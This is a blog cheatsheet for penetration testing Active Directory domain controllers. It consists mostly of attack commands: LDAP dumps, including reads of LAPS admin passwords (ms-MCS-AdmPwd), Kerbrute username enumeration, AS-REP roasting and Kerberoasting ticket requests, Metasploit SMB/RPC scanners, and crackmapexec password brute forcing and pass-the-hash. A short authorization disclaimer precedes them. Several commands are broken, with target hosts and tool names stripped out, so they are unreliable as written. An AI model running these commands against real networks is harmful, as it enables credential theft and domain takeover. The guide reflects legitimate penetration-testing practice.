Pentesting Domain Controllers Cheatsheet

In this blog post, we will share with you a comprehensive cheatsheet for pentesting those powerful and critical domain controllers. Now, I know what you're thinking: "But why, oh wise one, do we need such a guide?" Well, let me tell you, domain controllers are the repositories of your organization's most sensitive information - user credentials, group policies, and what not. And if not secured properly, they can lead to catastrophic data breaches or even system takeovers! 

So buckle up, as we explore various techniques, tools for testing the security of domain controllers. From identifying potential vulnerabilities to exploiting  them, we've got you covered with practical examples, real-life scenarios, and actionable insights. So stay tuned and prepare yourself for a rollercoaster ride through the fascinating world of pentesting!

Note: Before proceeding with pentesting any system, it is essential to have proper authorization from concerned authorities and follow ethical guidelines. Happy learning!

This is just a brief/quick guide on what and how to Pentest a domain controller without digging too deep. if you are looking for a comprehensive guide, you can refer to my ACTIVE DIRECTORY PENETRATION TESTING CHEAT SHEET - RECON & INITIAL ACCESSACTIVE DIRECTORY PENTEST CHEAT SHEET - LATERAL MOVEMENT & PERSISTENCE TECHNIQUES


dig srv @DC_IP #Query ldap service dig +short srv @DC_IP #query Root Domain Controller dig +short a @DC_IP


#Nmap Scan for basic info nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 #Get Domain name ldapsearch -x -h -s base namingcontexts ldapsearch -H ldap:// -x -s base namingcontexts #Look for misconfigs - Finding ms-MCS-AdmPwd ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd #Dump Everything ldapsearch -LLL -x -H ldap:// -b '' -s base '(objectclass=*)' #Dump Everything using ldeep ldeep ldap -a -d STEINS.local -s ldap:// all dump


Objective is to gather as many valid usernames as possible, try to figure out the username format used by the organization using their email addresses or social engineering Example Name: John Smith Usernames: John.Smith, JohnS, Sjohn, SmithJ, JSmith, John.s try to figure it out and create a wordlist for yourself, you can use the below git reopo as a reference and create a list of usernames git clone cd Wordlists/Usernames # User Enumeration to find Valid Usernames kerbrute userenum --dc -d Common_names.txt

Find Pre-Auth Disabled Users DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip #AD Module - Finding users with PreauthNotRequired set Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuths


#Listing users with ServicePrincialName set using AD module Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #Get TGS Ticket Using sudo -request -dc-ip Steins.local/mark

SMB/rpc Access

Use this script for testing SMB & RPC, this will run most common test cases on SMB -p 593
#RPC Endpoints enum via metsploit msfconsole use auxiliary/scanner/smb/pipe_auditor use auxiliary/scanner/smb/smb_lookupsid use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
set rhosts run

SMB Bruteforcing

#Basic SMB & OS info crackmapexec smb #List Shares crackmapexec smb --shares #passing blank creds via smb crackmapexec smb --shares -u '' -p '' #If the password needs to be changed smbpasswd -U username -r #Brute forcing SMB Creds crackmapexec smb -u users.txt -p passwords.txt #Bruteforcing SMB using hashes proxychains crackmapexec -t 15 smb -u users -H hashes --no-bruteforce --continue-on-success


Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment